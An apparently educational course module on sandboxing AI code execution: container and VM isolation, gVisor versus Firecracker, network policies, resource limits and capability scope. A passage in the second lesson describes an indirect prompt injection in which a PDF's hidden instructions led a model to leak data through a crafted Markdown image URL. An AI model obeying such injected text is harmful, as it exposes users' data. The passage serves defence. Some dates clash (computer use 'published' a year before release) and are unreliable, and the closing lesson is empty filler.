How AI systems isolate code execution — containers, VMs, and the engineering decisions that keep millions of users safe.
In March 2023, OpenAI launched Code Interpreter (later renamed Advanced Data Analysis) in ChatGPT. The feature let users upload CSV files and run Python directly in the chat. Within days, security researchers including Johann Rehberger documented that the sandbox was stricter than it appeared: outbound network calls were blocked, the filesystem was ephemeral, and each session spun up in an isolated container that was discarded after the conversation ended. The boundary was not accidental — it was a deliberate architectural decision made before a single user touched the feature.
OpenAI's engineering blog noted the team spent months on isolation guarantees before launch, because a single misconfigured sandbox allowing network egress could have enabled data exfiltration at massive scale. The architecture question — what a sandbox permits versus what it prevents — turned out to be the entire product's safety story.
A sandbox is an isolated execution environment where code runs with deliberately constrained access to host resources. The word comes from the idea of a physical sandbox: children play freely inside it, but sand stays inside the box. For AI code execution, the "sand" is the generated code, and the "box" is an environment engineered to prevent that code from affecting anything outside it.
Modern sandboxes used for AI code execution stack several layers of isolation. At the outermost layer, container runtimes like Docker use Linux kernel namespaces to give each execution its own view of the process tree, network interfaces, and filesystem. Inside that, seccomp (secure computing mode) filters restrict which system calls the process is allowed to invoke — blocking dangerous calls like ptrace, mount, and raw socket creation even if the code tries them. Some implementations add a hypervisor layer beneath the container, running the container inside a lightweight VM (using tools like Firecracker, AWS's open-source microVM technology) so that a container escape still lands inside a VM rather than on the host.
Google's Colab, which powers Jupyter notebooks for tens of millions of users, uses a similar principle: each runtime is a separate VM allocated per user session, preventing cross-user interference. When your Colab session times out, the VM is destroyed — not paused, not saved, destroyed — ensuring no state persists between sessions unless you explicitly write to Google Drive.
A production AI code sandbox typically stacks: hypervisor (Firecracker/KVM) → container runtime (runc/gVisor) → seccomp filter → user-level process. Each layer independently enforces constraints, so a bypass at one layer hits the next.
Google open-sourced gVisor in 2018 as an alternative containment strategy. Rather than relying solely on Linux kernel namespaces, gVisor interposes a user-space kernel — called the Sentry — between the application and the host kernel. System calls from the sandboxed process are intercepted and handled by the Sentry, which reimplements a large subset of the Linux kernel API in Go. Only a small set of calls ever reach the actual host kernel.
The security argument is statistical: if a sandboxed process exploits a kernel vulnerability, it exploits the Sentry's Go implementation, not the host kernel. The attack surface is vastly reduced. The cost is performance: gVisor adds overhead on system-call-intensive workloads, sometimes 2–3x for I/O-heavy operations. Google uses gVisor in Google Cloud Run and App Engine, accepting the performance trade-off in exchange for stronger multi-tenant isolation.
Firecracker, developed by Amazon for AWS Lambda and Fargate, takes the opposite approach: instead of intercepting syscalls, it runs each function inside an actual micro-VM backed by KVM hardware virtualization. The boot time is under 125 milliseconds, small enough to be practical for serverless workloads. When Lambda executes your function, it is running inside a Firecracker VM — a full virtual machine, not just a container. This is why Lambda functions from different customers cannot share memory even if they run on the same physical host.
gVisor intercepts syscalls in user space (strong isolation, higher overhead). Firecracker uses hardware virtualization (near-native performance, full VM boundary). ChatGPT's Code Interpreter uses a variant of the container + seccomp approach, optimized for Python data analysis workloads specifically.
One of the most consequential sandbox design decisions is filesystem ephemerality. ChatGPT's Code Interpreter gives each session a writable /tmp directory, but that directory vanishes when the conversation context resets. There is no persistent home directory. Files the agent creates — charts, processed CSVs, intermediate model outputs — exist only for the session's duration unless the user explicitly downloads them.
This is a feature, not a limitation. An ephemeral filesystem means the sandbox starts clean every time, eliminating the risk of data from one user's session leaking into another's. It also prevents the accumulation of state that could be exploited across requests. The engineering tradeoff is that agents cannot build up persistent local knowledge between sessions without an external storage tool — which is precisely why capable AI agents integrate object storage (S3, GCS), databases, or dedicated memory tools as explicit external resources rather than relying on local disk.
3 questions — free, untracked, retake anytime.
Interrogate an AI about the engineering trade-offs between gVisor and Firecracker for a hypothetical multi-tenant code execution platform.
You are evaluating sandbox architectures for a platform that will execute AI-generated Python code on behalf of enterprise clients. Your AI advisor will help you think through the engineering decisions.
What sandboxes block, what they allow, and the documented incidents that revealed where those lines were drawn incorrectly.
In August 2023, security researcher Johann Rehberger published a proof-of-concept demonstrating prompt injection through a malicious PDF processed by ChatGPT's Code Interpreter. The injected instructions caused the model to exfiltrate data via a URL embedded in a rendered image — a channel the sandbox's network blocks did not cover because the outbound request was constructed as an image source in the chat UI, not a direct network call from the Python process. OpenAI patched the vector within weeks. The incident illustrated a fundamental principle: security boundaries in AI systems must account for all channels through which data can leave, not just the most obvious ones.
A code sandbox's attack surface is the set of all interfaces through which an attacker could cause unintended effects. For AI code execution environments, this surface is more complex than for traditional sandboxes because the code being executed is generated by a language model, which itself can be manipulated through the input data the code processes.
Rehberger's 2023 demonstration exposed what security engineers call an indirect prompt injection: malicious instructions embedded in data the AI processes (in that case, a PDF's metadata) that redirect the model's behavior. The sandbox correctly prevented the Python process from making direct outbound HTTP calls. But the model, influenced by injected instructions, constructed a Markdown image tag with a crafted URL. The browser rendering the chat interface then made the GET request — outside the sandbox entirely.
This category of attack — using the AI's own output rendering as an exfiltration channel — prompted OpenAI, Anthropic, and Google to implement additional output filtering, automatic URL sanitization in rendered content, and limits on what domains could be referenced in generated content. The fixes were not sandbox changes; they were model output policy changes.
The sandbox secures what the code process can do. It does not automatically secure what the model's output can cause when rendered. These are different threat models requiring different mitigations.
Most production AI code sandboxes implement one of three network policies: full block (no outbound connections), allowlist (only specific approved endpoints), or full access (unrestricted, used only in explicitly networked agent modes). ChatGPT's Advanced Data Analysis uses full block. Replit's Ghostwriter AI uses allowlist-based policy tied to the user's project configuration. Devin, Cognition AI's autonomous software engineer agent (released in 2024), operates with a browser and network access deliberately enabled — because the task of writing and deploying software inherently requires fetching packages, reading documentation, and running tests against live endpoints.
The choice between these policies is a function of the task, not a universal security stance. A data analysis sandbox needs no network access because all necessary data should already be uploaded. A software development agent needs network access because package managers, APIs, and deployment targets are inherently networked. The risk profiles differ by orders of magnitude: a networked agent can call external APIs, exfiltrate data, and interact with production systems.
Cognition published a transparency document in 2024 describing Devin's network access model. It runs inside a virtual machine with full internet access but with session recording, action logging, and explicit human approval gates before any deployment action. The security model is monitoring and approval rather than prevention — a fundamentally different philosophy from a locked-down data analysis sandbox.
Resource limits are often treated as performance management tools, but they are also security controls. CPU time limits prevent denial-of-service via infinite loops or computationally expensive operations designed to consume shared resources. Memory caps prevent a single session from exhausting host RAM in a multi-tenant environment. Process count limits prevent fork bombs — code that spawns processes exponentially until the host is overwhelmed.
Linux cgroups (control groups) implement these limits at the kernel level, and container runtimes expose them as configuration parameters. AWS Lambda enforces a hard 15-minute execution limit, 10 GB RAM cap, and 1,000 concurrent execution limit per account by default. Google Cloud Run enforces similar limits per container instance. ChatGPT's Code Interpreter enforces a per-cell execution timeout (observed at approximately 120 seconds) that prevents runaway computations from blocking the session indefinitely.
A less obvious resource limit is disk I/O throttling. Without it, a sandboxed process could write continuously to disk, consuming storage or causing I/O starvation that degrades performance for other tenants on the same host. Production platforms typically implement both IOPS limits (operations per second) and throughput limits (bytes per second) via cgroup blkio controllers.
Resource limits (CPU, memory, process count, disk I/O, network bandwidth) serve double duty as both performance controls and denial-of-service mitigations. A sandbox without resource limits is not truly secure even if its network policy is strict.
3 questions — free, untracked, retake anytime.
Work through the threat model for an AI agent that processes untrusted documents — where are the real security boundaries?
Your team is deploying an AI agent that accepts PDF uploads from untrusted sources, extracts data, and runs Python analysis. Think through the security boundaries with your AI advisor.
What sandboxed AI code runners can genuinely do — and the engineering boundaries that define where their power ends.
In November 2023, Anthropic published details about Claude's computer use capability (released publicly in October 2024). The system allows Claude to control a virtual desktop — moving a mouse, clicking, typing — within a sandboxed environment. Anthropic's documentation explicitly warned users not to give Claude access to sensitive data or accounts during beta, not because the sandbox could be broken, but because the model itself might take unintended actions. The capability worked; the constraint was on what you gave that capability access to. The lesson was stark: sandbox security and model capability scope are two different problems. A perfectly secure sandbox containing a fully capable agent with access to production systems is still dangerous.
Within their permitted boundaries, modern AI code execution sandboxes are genuinely powerful. ChatGPT's Advanced Data Analysis runs a full CPython interpreter with a large pre-installed library set including NumPy, pandas, matplotlib, scikit-learn, PIL, and dozens of others. It can perform complex numerical computation, train small machine learning models, process images, parse documents, generate visualizations, and execute multi-step data pipelines — all within a single session.
The computational resources available are non-trivial. Observed benchmarks suggest the Code Interpreter environment provides approximately 2 CPU cores and 4–8 GB of RAM per session. This is sufficient to train a scikit-learn gradient boosting model on datasets with millions of rows, run FAISS vector similarity search, or perform FFT analysis on large time series. Tasks that would once require a dedicated data engineering environment can now be accomplished conversationally.
E2B (a startup that provides sandboxed code execution as an API, used by companies building on top of models from Anthropic, OpenAI, and others) publishes its sandbox specifications publicly. Their standard Python sandbox provides 2 vCPUs, 512 MB RAM, and a 5-gigabyte ephemeral disk, with sessions lasting up to 24 hours. This is a different capability profile from ChatGPT's — more persistent, more storage, but less RAM — reflecting their target use case of long-running agentic tasks.
The real limit is not what the sandbox permits computationally — it's what data and external systems the sandbox has been given access to. A capable sandbox with no external data access is powerful but bounded. The same sandbox with database credentials and API keys is a fundamentally different risk surface.
The hard limits of sandboxed execution fall into several categories. First, there are computational limits enforced by cgroups: you cannot exceed allocated CPU or memory, and attempts to do so result in OOM (out of memory) kills or CPU throttling. Second, there are network limits: in full-block configurations, any socket operation returns immediately with a connection refused or permission denied error — the code has no way to distinguish a firewall block from a server being down.
Third, there are filesystem limits. Code running in ChatGPT's Code Interpreter cannot access the files of other users, cannot write to system directories, and cannot execute binaries that are not already present in the environment. Attempts to pip install packages that require network access will fail silently or with an explicit error if network is blocked. This means the available library set is fixed at environment provisioning time — a significant constraint for specialized domains.
Fourth, there are model-layer limits that are separate from sandbox limits. Even if the sandbox technically permits an operation, the model may refuse to generate code that performs it. Anthropic's Claude will refuse to write functional malware even if the sandbox would permit executing it. This is a model policy constraint, not a sandbox constraint — an important distinction because model policies can be updated independently of sandbox architecture.
One notable absence in most AI code sandboxes is GPU access. ChatGPT's Code Interpreter runs on CPU only. This is not a security decision — GPUs can be virtualized and sandboxed effectively using NVIDIA's vGPU technology or AMD's equivalent. It is an economics decision: GPU instances cost 10–100x more than CPU instances, and providing GPU access to every user session would be prohibitively expensive at scale.
The practical consequence is that sandboxed AI code execution is suitable for data analysis, statistical modeling, and inference with pre-trained models loaded in CPU mode — but not for training deep learning models. A user trying to fine-tune a transformer model in ChatGPT's sandbox will hit computation time limits before meaningful training occurs. Google Colab addresses this by offering GPU runtimes as a premium feature, with session limits (90 minutes to 12 hours depending on tier) enforced to manage GPU allocation.
For AI agents in production that need GPU inference, the standard pattern is to call an external inference API (OpenAI, Anthropic, Replicate, Together AI) from within the sandbox, rather than running GPU workloads locally. The sandbox becomes an orchestration layer, and the GPU compute happens outside it — with all the security implications that external API calls entail.
Sandboxed code + external inference API = the dominant production pattern for AI agents needing ML capabilities. The sandbox handles data processing and orchestration; external APIs handle GPU-dependent inference. This separates the security boundary problem from the compute resource problem.
3 questions — free, untracked, retake anytime.
Design the capability envelope for a production AI data analysis agent — what do you enable, what do you restrict, and why?
Your organization wants to deploy an AI agent that analyzes financial data from internal databases. You need to define what the agent's sandbox can and cannot do.
This lesson explores lesson 4: integration patterns — examining the key principles, real-world applications, and implications for practitioners working in this domain.
Understanding this topic requires both theoretical grounding and practical awareness of how these concepts manifest in deployed systems. The frameworks covered in earlier lessons provide the foundation; this lesson connects them to implementation reality.
The transition from theory to practice reveals challenges that pure conceptual frameworks don't capture. Real-world deployment introduces constraints, trade-offs, and edge cases that demand nuanced judgment rather than rigid rule-following.
Effective practitioners in this space develop the ability to reason across multiple frameworks simultaneously, recognizing when different perspectives apply and how to resolve conflicts between competing priorities.
As this field continues to evolve, the principles covered in this module will remain foundational even as specific technologies and implementations change. The ability to think critically about these topics — rather than simply memorizing current best practices — is what separates effective practitioners from those who merely follow checklists.
Use the AI below to explore the concepts from Lesson 4 in depth. Ask questions, challenge assumptions, and work through practical scenarios related to lesson 4: integration patterns.